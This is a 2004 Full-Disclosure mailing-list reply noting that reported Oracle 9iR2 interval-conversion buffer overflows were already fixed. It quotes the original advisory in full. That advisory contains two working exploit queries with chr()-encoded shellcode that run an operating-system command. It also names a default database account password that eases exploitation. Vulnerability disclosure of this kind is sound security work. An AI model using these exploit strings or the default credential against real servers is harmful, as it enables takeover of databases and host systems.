[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.WNT.4.58.0402051318010.304@Nanook>
From: chris at ngssoftware.com (Chris Anley)
Subject: Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow
Hey Cesar.
These are known bugs.
We (NGS) found and reported them last year. As you say, Oracle has
already fixed them and released a patch. Check out
http://www.nextgenss.com/research.html
...where we posted advisories on these bugs in December, along with
another couple in from_tz and time_zone. We've historically found a lot
of issues in Oracle, so if you want to eliminate the stuff that's already
fixed from your list of 60+ issues it's a good place to look; the fine
detail isn't always available in the Oracle alerts.
-chris.
On Thu, 5 Feb 2004, Cesar wrote:
> Security Advisory
>
> Name: Oracle Database 9ir2 Interval Conversion
> Functions Buffer Overflow.
> System Affected : Oracle Database 9ir2, previous
> versions could be affected too.
> Severity : High
> Remote exploitable : Yes
> Author: Cesar Cerrudo.
> Date: 02/05/04
> Advisory Number: CC020401
>
>
> Legal Notice:
>
> This Advisory is Copyright (c) 2003 Cesar Cerrudo.
> You may distribute it unmodified and for free. You may
> NOT modify it and distribute it or distribute
> parts of it without the author's written permission.
> You may NOT use it for commercial intentions
> (this means include it in vulnerabilities databases,
> vulnerabilities scanners, any paid service,
> etc.) without the author's written permission. You are
> free to use Oracle details for commercial intentions.
>
>
> Disclaimer:
>
> The information in this advisory is believed to be
> true though it may be false.
> The opinions expressed in this advisory are my own and
> not of any company. The usual standard
> disclaimer applies, especially the fact that Cesar
> Cerrudo is not liable for any damages caused
> by direct or indirect use of the information or
> functionality provided by this advisory.
> Cesar Cerrudo bears no responsibility for content or
> misuse of this advisory or any derivatives thereof.
>
>
>
> !!!!!!!!!!!ALERT!!!!!!!!!!!:
>
> Oracle was contacted about these vulnerabilities, but
> their Security Response Team is one of the worst that
> i have deal with, they don't care about security and
> they don't even follow OISafety rules(Oracle is a
> member).
> Because this reason we only have told to Oracle about
> just a couple of bugs, i think i won't contact them
> anymore,
> or maybe if i get a letter from Larry Ellison asking
> for apologies...:).
> Anyways if Oracle would spend more money on security
> than in marketing saying that their products are
> unbreakable
> everything would be different. Right now Oracle
> database server and other Oracle products are some
> kind of backdoor.
> These vulnerabilities are just only a bit of +60 that
> we have identified (yes more than 60 issues and
> most of these issues can be exploited by any low
> privileged user to take complete control over the
> database and probably OS, also for some of them there
> aren't any workarounds). If you are running Oracle i
> recomend you to start praying to not being hacked and
> to start complaining to Oracle to improve the quality
> of
> their products and to release patches.
>
> BTW: if someone from Oracle dares to say that i'm not
> telling the true, then probably i will release all the
> holes
> information to shut their mouths.
>
> Some workaround to protect your Oracle servers until
> maybe next year when Oracle probably could fix their
> buggy
> database server:
>
> -Check packages permissions and remove public
> permission, set minimal permissions
> that fit your needs.
> -Check Directory Objects permissions and remove public
> permission, set minimal permissions
> that fit your need, remove Directory Objecs if not
> used.
> -Restrict users to execute directly PL/SQL statements
> over the server.
> -Periodically audit users permissions on all database
> objects.
> -Lock users that aren't used.
> -Change default passwords.
> If you want automation, i really like AppDetective for
> Oracle:
> http://www.appsecinc.com/products/appdetective/oracle/
>
>
> Overview:
>
> Oracle Database Server is one of the most used
> database servers in the world, it was marketed
> as being unbreakable and many people thinks that is
> one of the most secure database server in
> the market. Larry Ellison (Oracle CEO) says that
> Oracle is used by NSA, CIA, russian intelligence,
> goverments, etc.
> (www.commonwealthclub.org/archive/96/96-03ellison-qa.html),
> so it must be really secure!!!
> Oracle Database Server provides two functions that can
> be used with PL/SQL to convert numbers
> to date/time intervals, these functions have buffer
> overflow vulnerebilities.
>
>
>
> Details:
>
> When any of these conversion funcions are called with
> a long string as a second
> parameter a buffer overflow occurs.
>
> To reproduce the overflow execute the next PL/SQL:
>
> SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
>
> SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
>
>
>
> This vulnerability can be exploited by any Oracle
> Database user because access to these
> functions can't be restricted.
> Explotation of this vulnerability allow an attacker to
> execute arbitrary code, also it
> can be exploited to cause DOS (Denial of service)
> killing Oracle server process. An attacker can
> complete compromise the OS and database if Oracle is
> running on Windows plataform, because Oracle must
> run under the local System account or under an
> administrative account. If Oracle is running on *nix
> then only the database could be compromised because
> Oracle runs mostly under oracle user which has
> restricted
> permissions.
> Important!: Explotation of these vulnerabilities
> becomes easy if Oracle Internet Directory has
> been deployed, because Oracle Internet Directory
> creates a database user called ODSCOMMON that
> has a default password ODSCOMMON (Unbreakable???,
> hahaha, please take a look at this
>
> http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html),
> this password can not be changed,
> so any attacker can use this user to connect to
> database and exploit these vunerabilities.
>
>
> Full tests on Oracle database 9ir2 under Microsoft
> Windows 2000 Server and Linux confirm these
> vulnerabilities,
> versions running in other OS plataforms are believed
> to be affected too.
> Previous Oracle Database Server versions could be
> affected by these vulnerabilities.
>
>
>
> Exploits:
>
> --these exploits should work on W2K Server and WinXp,
> not tested on Win2003.
> --run any command at the end of the string
> SELECT
> NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> ||
>
> chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
>
> 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
> ARE YOU SURE? >c:\Unbreakable.txt')
>
> FROM DUAL;
>
> SELECT
> NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> ||
>
> chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
>
> 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
> ARE YOU SURE? >c:\Unbreakable.txt')
>
> FROM DUAL;
>
>
>
> Vendor Fix:
>
> Go to Oracle Metalink site, http://metalink.oracle.com
>
>
> Vendor Contact:
>
> Oracle was contacted and they released a fix without
> telling me nor the public anything and without issuing
> an alert.
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! Finance: Get your refund fast by filing online.
> http://taxes.yahoo.com/filing.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
Powered by blists - more mailing lists